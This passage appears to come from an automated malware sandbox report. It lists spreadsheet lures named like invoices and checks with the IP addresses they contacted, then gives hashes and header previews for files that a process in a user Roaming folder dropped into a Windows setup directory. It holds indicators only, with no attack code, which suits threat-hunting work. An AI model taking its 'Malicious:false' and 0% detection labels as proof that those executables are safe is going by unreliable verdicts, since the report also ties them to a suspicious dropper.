                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              export of document 555091.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              fax 4044.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              check 24994.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              generated check 8460.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              export of check 209162.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182
                                                                                                                                                                                                              generated purchase order 045950.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              • 185.60.216.6
                                                                                                                                                                                                              • 185.60.216.19
                                                                                                                                                                                                              • 192.229.221.185
                                                                                                                                                                                                              • 52.45.173.110
                                                                                                                                                                                                              • 172.217.168.66
                                                                                                                                                                                                              • 34.251.174.164
                                                                                                                                                                                                              • 152.199.21.175
                                                                                                                                                                                                              • 142.250.185.102
                                                                                                                                                                                                              • 34.252.156.174
                                                                                                                                                                                                              • 104.16.18.94
                                                                                                                                                                                                              • 52.210.171.182

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                              C:\$WINDOWS.~BT\Sources\Panther\diagerr.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1908
                                                                                                                                                                                                              Entropy (8bit):4.874587641202385
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:5I5aVbJDP+tUI0X3AN0/1Cvf/g3vvQ/1Cv8Gh/1Cvze/g3vO/1CvVL/1CvR/g3v9:5MwiGI0P4GsfT/7eLy
                                                                                                                                                                                                              MD5:D1E75542EC8D1B4851765A57AC63618E
                                                                                                                                                                                                              SHA1:A231451F545D3133E5D6A0487A59C5DBD01EE50E
                                                                                                                                                                                                              SHA-256:6C06BF950D0FE3476E020CD363EC0C8C9D4EE0FC89A24C50780C44E6453995C6
                                                                                                                                                                                                              SHA-512:89D3C182833B97B0899ECD45DE1439F8341BF2EA11578E2085375A4DB3CC18FAD221998DC4B6F4407381D2134CB43D78025349DED1E50B6A4EEA5919B18B168C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: .<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                                                                                                              C:\$WINDOWS.~BT\Sources\Panther\diagwrn.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5021
                                                                                                                                                                                                              Entropy (8bit):5.356889117391597
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:5MwiGdgbnE0jiecK0jiecU0jiecB0jiecPNaU0ylSjStSDdMVnWy:53gbELKLULBLPNN3YSkDdMxp
                                                                                                                                                                                                              MD5:67A0FCA8B02916A9866EB1E23A514293
                                                                                                                                                                                                              SHA1:6570204CA5672D3141ADE39F2E2CDF1F5919AAB3
                                                                                                                                                                                                              SHA-256:FA7E39A796427CD9C4EBA5EE889FB285DB3DF5CFA9B95935159DA3DE33E2A8BE
                                                                                                                                                                                                              SHA-512:C419D6F4201D8D0AA0485295058B263147BEFAE9EDBB9233D1848DA21335C1C5EF10AF9D03AB9D1B9E233A059F669EAC9848B8909E25EE634AA0ACE932A8AA3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: .<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                                                                                                              C:\$WINDOWS.~BT\Sources\Panther\setupact.log
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6296
                                                                                                                                                                                                              Entropy (8bit):4.485105999680189
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:GRnslO+NxqCazjm7ec+oiecrPFec0NFecKDrR1J5w4yvmKVOnc57Rw:sUaSMXcKDlP
                                                                                                                                                                                                              MD5:24DC62FABC78D6E60C6993D04F4645EC
                                                                                                                                                                                                              SHA1:6556D1BA7CCE1ADBFEC253BA0077F38AFEC6BF24
                                                                                                                                                                                                              SHA-256:87BC83F32B8BB4FE355FB079F1F9B871D6A5B2A18183B395091B66CF9CA1832B
                                                                                                                                                                                                              SHA-512:6A1A0D93A9966A2CE4FDAB8457E392567BEAD5B6FD9D605ACEBA62EDBAE21F97B3AECE5683517E53E48734165EA2CE7AA511D1BB2E35D84D44B2FF019830210F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: .2021-05-12 15:16:23, Info SP CSetupPlatform::Initialize: Setup log starts:..2021-05-12 15:16:23, Info SP SEH: Enter CExceptionHandler::CExceptionHandler..2021-05-12 15:16:23, Info SP SEH: Exit CExceptionHandler::CExceptionHandler..2021-05-12 15:16:23, Info SP Host system information:.. VM: NO.. Firmware type: PCAT.. Manufacturer: VUc47uZuYH6ZPVf.. Model : oF35Y4x3.. BIOS name : PhoenixBIOS 4.0 Release 6.0 .. BIOS version : EX25M.. BIOS release date : 20181212000000.000000+000.. Total memory : 8589148160.. Number of physical CPUs : 2.. Number of logical CPUs : 2..
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\DU.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):123712
                                                                                                                                                                                                              Entropy (8bit):6.460431067934838
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:7UTZhzH2+F3yOme7PNWCsWlMzeNDz7biF4jL4hgXE:GbF13PACNlDzS4Cn
                                                                                                                                                                                                              MD5:7727A405C9878C2FE052922C1F965384
                                                                                                                                                                                                              SHA1:12EF6479A97C7A6574CA8DD7BE6B64F47B79F710
                                                                                                                                                                                                              SHA-256:4912ABC0A250DFAF63A48E4165E94AB701505F14BCC7A1464D5588FA2D434564
                                                                                                                                                                                                              SHA-512:55C1A07BC932C619B585E3B883EAF581F5A0C5C8ED0AB1D1D0386DD344501746420D2541F0CD3CAFF984472AB65B8A7D49F5FD8821F45E5C4FA7194DDB89E09E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..#wd}pwd}pwd}pc.~qud}pc.yqfd}pwd|p.d}pc.|qbd}pc.xq.d}pc.}qvd}pc.tqld}pc..pvd}pc..qvd}pRichwd}p........................PE..L....u.............!.........D.......j...............................................;....@A........................ ...................................@!..........0...T...............................@.......................@....................text....~.......................... ..`.data...............................@....idata..z...........................@..@.didat..............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\DiagTrack.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):922976
                                                                                                                                                                                                              Entropy (8bit):6.46965241570797
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:Er+9jUr2TTWLQRPwMRlf+8Kh+fx6gmkwJKdMrtUIHkaMNUEP3g5Qy1Jxb3ArS:A+9jUr2TTr5LlfcwwggUhnNzg5Rbwr
                                                                                                                                                                                                              MD5:6C3F6A6BC5EDE978E9DFE1ACCE386339
                                                                                                                                                                                                              SHA1:3B7B51D762C593E92123F9365A896ED64EE26A7A
                                                                                                                                                                                                              SHA-256:B55D66F2943F1C63EA9B39DAE88AA2A4F91775CEFFFEFD263BD302866A7BD91C
                                                                                                                                                                                                              SHA-512:3F87064354A0F55F36AA272C5918D208B8A77FFFB7965E9B50727C06FD8D8DB5E6695636A7DB37926FE444C91E4A4A7DC892EF5EF57676BA9515216D5E5F94FF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&..&..&..J..*..&....J.....J..(..J..(..J..'..J.....J..'..J..'..Rich&..........................PE..L.....2V...........-.........d...............................................P......D.....@A........................ ...]...`...@.......p...............`!..........N..8...........................HO..@...............\.......@....................text...}........................... ..`.data...............................@....idata...&.......(..................@..@.didat.. ...........................@....rsrc...p...........................@..@.reloc..............`..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\DiagTrackRunner.exe
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79040
                                                                                                                                                                                                              Entropy (8bit):5.68085764397868
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ctlKhKIqVXrOLgef8j1D8KxLQgSSQlsJkGAsC:SlYKrOMso1D8KxLQgSdKJMsC
                                                                                                                                                                                                              MD5:76F30A1E149792D2542A253B920CBEF6
                                                                                                                                                                                                              SHA1:9040E0873DF5CC2A64B850D1B8159B77528BA62C
                                                                                                                                                                                                              SHA-256:488CBC8330952DD13B797BB40E4E30610ED03483C25919C39555F7B334A3C159
                                                                                                                                                                                                              SHA-512:EC39861A3F39F88AAD52975974C988AE76376A09136D95F5D4FEDD60EE7EC252736D882CEF77298D82D786E0DAD13C61148B29D7C5FB7BA7D7C74B05DE9D7E84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S....-%.P....-&.F....-'.U....-;.X...S........-#.R....-9.R....-$.R...RichS...................PE..L...Y.2V.................V...........U.......p....@..........................0......M.....@.................................,...x........................<... .......#..8............................$..@...............(............................text...0U.......V.................. ..`.data........p.......Z..............@....idata...............\..............@..@.rsrc................d..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Diager.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41792
                                                                                                                                                                                                              Entropy (8bit):6.371638869251201
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:GjGabdDxVfFrX8khxIWdOghUak3h1PQRVta:G9dDxNFrX80IWdOdaeXP4ta
                                                                                                                                                                                                              MD5:4396BDD1707419909F04A92184AD1317
                                                                                                                                                                                                              SHA1:EAA238531420DCFBDB864FA31BD95373B53977D7
                                                                                                                                                                                                              SHA-256:AE0F8123D3EF8801961211D7D71780BEE76C418EBC8C6893B385D5FABA6BB68F
                                                                                                                                                                                                              SHA-512:D7E526A1BB8B7D4FB91DE5F10DD1CD1A005DD26AEC7839B22E66303BADA8ECBA34E92F2467EA510584C29C93C51A78C4FA36849050F72BFEDA456671136AA8EC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h.Z.,.4.,.4.,.4.8.7...4.8.0.".4.,.5...4.8.5.#.4.8.1.).4.8.4.-.4.8.=.%.4.8..-.4.8.6.-.4.Rich,.4.........................PE..L...E9.I...........!.....^...".......X.......p............................................@A.........................e......P...........................@!...........$..T...............................@...............L....d..@....................text...j\.......^.................. ..`.data........p.......b..............@....idata...............d..............@..@.didat...............t..............@....rsrc................v..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\MediaSetupUIMgr.dll
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\9697.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15634744
                                                                                                                                                                                                              Entropy (8bit):2.7509316397129315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:mzKrn9w8KDsQ/z20NoJDZVm4z0VdwmTRjnaQbjAKz7h8n5Ou:AK+8KQ820aXVdz0VdwmTRjamPh8n5L
                                                                                                                                                                                                              MD5:BDBD14F60FC78EDCA16A022C9801CF70
                                                                                                                                                                                                              SHA1:E24CE3852CC9D42296C3FD550735069B86D7518A
                                                                                                                                                                                                              SHA-256:A2679D717DB07F43D81F895E508520E01CD0262F1BE5870333D12CE71FE02DB4
                                                                                                                                                                                                              SHA-512:6D6AA6AA8108D49347B4D5B40C632E568D44805D6352B517363262A408F7E04CAFB3A66D1CB121BF920DF080C7119401C454F90BA9A47FFE593CE9CB11DA78B8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.2;Kja;Kja;Kja/ i`=Kja/ n`-Kja/ k`.Kja;Kka.Ija/ o`0Kja/ j`:Kja/ c`^Kja/ .a:Kja/ h`:KjaRich;Kja........................PE..L................-.........T..............0.......................................%....@A........................P&..X.......h.......L............p..8!...@..........T...........................p...@............................................text............................... ..`.data...tK...0...&..................@....idata...#.......$...B..............@..@.rsrc................f..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\Eula.rtf
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:Rich Text Format data, version 1, unknown character set
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):204389
                                                                                                                                                                                                              Entropy (8bit):4.985414889759749
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:sT9Ps8LkRAdnz0g2qnCcuwXiSjwJ7RSnhkcA9Zs5uu3lQL:sVwzgFs
                                                                                                                                                                                                              MD5:CD28B51516A9309B350607DC57FACA76
                                                                                                                                                                                                              SHA1:C9F8E72F1184DAC6AD40A94295A594A94B1E48C4
                                                                                                                                                                                                              SHA-256:7FBF900FDD0EABE63DEF6C5B432B5D3FF51F8EC9AF7D9E9AB3A9D7441D032C22
                                                                                                                                                                                                              SHA-512:7C7CB19B814DEBCDD5A1717F2039492EF9FD018DDF5FF0647CFB13FCFF550EB20F44960CE239033E8BEF4BFFC0D2668E9574F2AFF3B4385606AB1AECC1E1DE12
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff40\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f11\fbidi \froman\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt \'82\'6c\'82\'72 \'96\'be\'92\'a9};}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}{\f41\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}{\f43\fbidi \froman\fcharset128\fprq1{\*\panose 02020609040205080304}@MS Mincho;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\diagerr.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3518
                                                                                                                                                                                                              Entropy (8bit):5.335324516358906
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5MwiGI0P4GsfT/7YQPoZQwkRcEQ56WQfQWr:5MwiGdgbnHPXL652Iw
                                                                                                                                                                                                              MD5:459370B43A10CA3705C364A859F94272
                                                                                                                                                                                                              SHA1:534EFEAFCF4A2C73E9CE1A758439D214674BD3B3
                                                                                                                                                                                                              SHA-256:CCB5BA86BBCBC5A0199EDD0C86534ED3135A8172C8D91F46A5D0E0C432A64544
                                                                                                                                                                                                              SHA-512:4F8BE4183AEB4E1BD94B21FC3EDCCC7B840EEBCEBB7AC248A56792C408ED0BDCB98B2EF8448C58DC300A8BA68165BE8EE33AE1AC773CA1951B74287D05A6A1BE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\diagwrn.xml
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17765
                                                                                                                                                                                                              Entropy (8bit):5.433332057361117
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:53gbEP1PoPpCP4PSfPiPSTPSmPSdPSJPSAPS2PSAPS0PSlPSUP41PknPSP1P47PD:53I/eGJiMzG3G
                                                                                                                                                                                                              MD5:98BFB35692BFEE8D2851D24378725854
                                                                                                                                                                                                              SHA1:3C43317B741057448B999F328BE036DC15ED965A
                                                                                                                                                                                                              SHA-256:2E90F39E719D5437D61910E8905E579EE913788163243E9E5098673240F11474
                                                                                                                                                                                                              SHA-512:0D767EAA08E490C6D9CE3AFBD2CA22369C77E730F88523AC539D4FFDBBA7DE58B1F8630D0AADF3F23DFFD41611894656D47A13A0E8D0D71BBB4623FD852B6947
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                                                                                                              C:\$Windows.~WS\Sources\Panther\setupact.log
                                                                                                                                                                                                              Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33657
                                                                                                                                                                                                              Entropy (8bit):4.945002853780828
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:6g2bZs3udcj+/emi2+p9l9wBwDoAVsPFjfE55ojOjeeFV+7sy5lKbMVlJEmC7Lzu:hojfU/qwDaZw6GSQy2AzwUYaFBF6DSoo
                                                                                                                                                                                                              MD5:96D235A26DBCAA229A81CB03BD243A90
                                                                                                                                                                                                              SHA1:F51FA8B8ADD23D4485BFAA9EF8FEAEA7E5BE0944
                                                                                                                                                                                                              SHA-256:BD87E7E7AC502453F904B3F09E3631AA581412464021A45BC6D62542D39B7807
                                                                                                                                                                                                              SHA-512:5C6204D7EF2A9C1CE1371057D7772DA6BDAE370D14DE28E892D5FC7AA42FFCAA6B4D4094FCF6D68FFCA8D8B0CF900E30881DED11474A166612DE65EC5F7CE109
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .2021-05-12 15:15:53, Info MOUPG *************** SetupHost Logging Begin ***************..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: ModulePath = [C:\$Windows.~WS\Sources]..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: WorkingPath = [C:\$Windows.~WS\Sources]..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: LoggingPath = [C:\$Windows.~WS\Sources\Panther]..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: MediaPath = []..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: InstallFilePath = []..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: ActionListFilePath = []..2021-05-12 15:15:53, Info MOUPG SetupHost::Initialize: CmdLine = [/Download /Web ]..2021-05-12
